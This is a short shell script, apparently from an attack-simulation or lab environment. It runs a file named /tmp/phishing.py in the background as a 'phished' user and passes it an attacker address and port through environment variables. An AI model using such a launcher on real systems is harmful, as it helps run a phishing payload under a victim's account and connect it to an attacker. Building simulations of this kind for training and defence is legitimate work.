#!/bin/sh

su $CLIENT_PHISHED_USER_NAME -c "export ATTACKER_ADDRESS=$CLIENT_PHISHED_ATTACKER_ADDRESS; export ATTACKER_PORT=$CLIENT_PHISHED_ATTACKER_PORT; export PYTHONUNBUFFERED=1; nohup python3 /tmp/phishing.py 2>&1 &"
